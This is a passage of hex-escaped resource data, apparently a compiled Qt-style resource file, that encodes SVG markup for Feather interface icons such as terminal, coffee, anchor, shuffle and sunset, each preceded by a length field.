\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x72\x6e\x65\
\x72\x2d\x64\x6f\x77\x6e\x2d\x6c\x65\x66\x74\x22\x3e\x3c\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x39\
\x20\x31\x30\x20\x34\x20\x31\x35\x20\x39\x20\x32\x30\x22\x3e\x3c\
\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\
\x64\x3d\x22\x4d\x32\x30\x20\x34\x76\x37\x61\x34\x20\x34\x20\x30\
\x20\x30\x20\x31\x2d\x34\x20\x34\x48\x34\x22\x3e\x3c\x2f\x70\x61\
\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x36\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x65\x72\x6d\x69\
\x6e\x61\x6c\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\
\x6f\x69\x6e\x74\x73\x3d\x22\x34\x20\x31\x37\x20\x31\x30\x20\x31\
\x31\x20\x34\x20\x35\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\
\x79\x31\x3d\x22\x31\x39\x22\x20\x78\x32\x3d\x22\x32\x30\x22\x20\
\x79\x32\x3d\x22\x31\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x5c\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x69\x74\x61\x6c\x69\
\x63\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x39\x22\
\x20\x79\x31\x3d\x22\x34\x22\x20\x78\x32\x3d\x22\x31\x30\x22\x20\
\x79\x32\x3d\x22\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x34\x22\x20\x79\x31\x3d\x22\
\x32\x30\x22\x20\x78\x32\x3d\x22\x35\x22\x20\x79\x32\x3d\x22\x32\
\x30\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x31\x35\x22\x20\x79\x31\x3d\x22\x34\x22\x20\x78\
\x32\x3d\x22\x39\x22\x20\x79\x32\x3d\x22\x32\x30\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x85\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x72\x61\x64\x69\x6f\
\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\
\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x32\x22\x3e\
\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\
\x3d\x22\x4d\x31\x36\x2e\x32\x34\x20\x37\x2e\x37\x36\x61\x36\x20\
\x36\x20\x30\x20\x30\x20\x31\x20\x30\x20\x38\x2e\x34\x39\x6d\x2d\
\x38\x2e\x34\x38\x2d\x2e\x30\x31\x61\x36\x20\x36\x20\x30\x20\x30\
\x20\x31\x20\x30\x2d\x38\x2e\x34\x39\x6d\x31\x31\x2e\x33\x31\x2d\
\x32\x2e\x38\x32\x61\x31\x30\x20\x31\x30\x20\x30\x20\x30\x20\x31\
\x20\x30\x20\x31\x34\x2e\x31\x34\x6d\x2d\x31\x34\x2e\x31\x34\x20\
\x30\x61\x31\x30\x20\x31\x30\x20\x30\x20\x30\x20\x31\x20\x30\x2d\
\x31\x34\x2e\x31\x34\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x3d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x72\x6e\x65\
\x72\x2d\x6c\x65\x66\x74\x2d\x64\x6f\x77\x6e\x22\x3e\x3c\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\
\x34\x20\x31\x35\x20\x39\x20\x32\x30\x20\x34\x20\x31\x35\x22\x3e\
\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\
\x20\x64\x3d\x22\x4d\x32\x30\x20\x34\x68\x2d\x37\x61\x34\x20\x34\
\x20\x30\x20\x30\x20\x30\x2d\x34\x20\x34\x76\x31\x32\x22\x3e\x3c\
\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x88\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x72\x65\x70\x65\x61\
\x74\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\
\x6e\x74\x73\x3d\x22\x31\x37\x20\x31\x20\x32\x31\x20\x35\x20\x31\
\x37\x20\x39\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\
\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x33\x20\x31\x31\x56\x39\
\x61\x34\x20\x34\x20\x30\x20\x30\x20\x31\x20\x34\x2d\x34\x68\x31\
\x34\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x37\x20\x32\x33\
\x20\x33\x20\x31\x39\x20\x37\x20\x31\x35\x22\x3e\x3c\x2f\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x32\x31\x20\x31\x33\x76\x32\x61\x34\x20\x34\x20\x30\x20\x30\
\x20\x31\x2d\x34\x20\x34\x48\x33\x22\x3e\x3c\x2f\x70\x61\x74\x68\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x59\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x6e\x63\x68\x6f\
\x72\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\
\x32\x22\x20\x63\x79\x3d\x22\x35\x22\x20\x72\x3d\x22\x33\x22\x3e\
\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x32\x32\x22\x20\x78\
\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x38\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x35\
\x20\x31\x32\x48\x32\x61\x31\x30\x20\x31\x30\x20\x30\x20\x30\x20\
\x30\x20\x32\x30\x20\x30\x68\x2d\x33\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xbf\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x66\x66\x65\
\x65\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x38\x20\
\x38\x68\x31\x61\x34\x20\x34\x20\x30\x20\x30\x20\x31\x20\x30\x20\
\x38\x68\x2d\x31\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\
\x74\x68\x20\x64\x3d\x22\x4d\x32\x20\x38\x68\x31\x36\x76\x39\x61\
\x34\x20\x34\x20\x30\x20\x30\x20\x31\x2d\x34\x20\x34\x48\x36\x61\
\x34\x20\x34\x20\x30\x20\x30\x20\x31\x2d\x34\x2d\x34\x56\x38\x7a\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x36\x22\x20\x79\x31\x3d\x22\x31\x22\x20\x78\x32\x3d\
\x22\x36\x22\x20\x79\x32\x3d\x22\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x30\x22\x20\
\x79\x31\x3d\x22\x31\x22\x20\x78\x32\x3d\x22\x31\x30\x22\x20\x79\
\x32\x3d\x22\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x31\x34\x22\x20\x79\x31\x3d\x22\x31\
\x22\x20\x78\x32\x3d\x22\x31\x34\x22\x20\x79\x32\x3d\x22\x34\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x0d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x68\x65\x76\x72\
\x6f\x6e\x2d\x64\x6f\x77\x6e\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x36\x20\x39\x20\x31\
\x32\x20\x31\x35\x20\x31\x38\x20\x39\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xb9\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x68\x75\x66\x66\
\x6c\x65\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x31\x36\x20\x33\x20\x32\x31\x20\x33\x20\
\x32\x31\x20\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x34\x22\x20\x79\x31\
\x3d\x22\x32\x30\x22\x20\x78\x32\x3d\x22\x32\x31\x22\x20\x79\x32\
\x3d\x22\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x32\x31\
\x20\x31\x36\x20\x32\x31\x20\x32\x31\x20\x31\x36\x20\x32\x31\x22\
\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x31\x35\x22\x20\x79\x31\x3d\x22\x31\x35\
\x22\x20\x78\x32\x3d\x22\x32\x31\x22\x20\x79\x32\x3d\x22\x32\x31\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x34\x22\x20\x79\x31\x3d\x22\x34\x22\x20\x78\x32\x3d\
\x22\x39\x22\x20\x79\x32\x3d\x22\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x23\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x65\x64\x69\x74\x2d\
\x32\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x37\x20\
\x33\x61\x32\x2e\x38\x32\x38\x20\x32\x2e\x38\x32\x38\x20\x30\x20\
\x31\x20\x31\x20\x34\x20\x34\x4c\x37\x2e\x35\x20\x32\x30\x2e\x35\
\x20\x32\x20\x32\x32\x6c\x31\x2e\x35\x2d\x35\x2e\x35\x4c\x31\x37\
\x20\x33\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x5e\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x65\x72\x63\x65\
\x6e\x74\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x39\
\x22\x20\x79\x31\x3d\x22\x35\x22\x20\x78\x32\x3d\x22\x35\x22\x20\
\x79\x32\x3d\x22\x31\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x36\x2e\x35\x22\x20\
\x63\x79\x3d\x22\x36\x2e\x35\x22\x20\x72\x3d\x22\x32\x2e\x35\x22\
\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x63\x69\x72\x63\x6c\
\x65\x20\x63\x78\x3d\x22\x31\x37\x2e\x35\x22\x20\x63\x79\x3d\x22\
\x31\x37\x2e\x35\x22\x20\x72\x3d\x22\x32\x2e\x35\x22\x3e\x3c\x2f\
\x63\x69\x72\x63\x6c\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x4c\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x75\x6e\x73\x65\
\x74\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x37\x20\
\x31\x38\x61\x35\x20\x35\x20\x30\x20\x30\x20\x30\x2d\x31\x30\x20\
\x30\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x39\x22\x20\x78\
\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x32\x22\x3e\x3c\x2f\
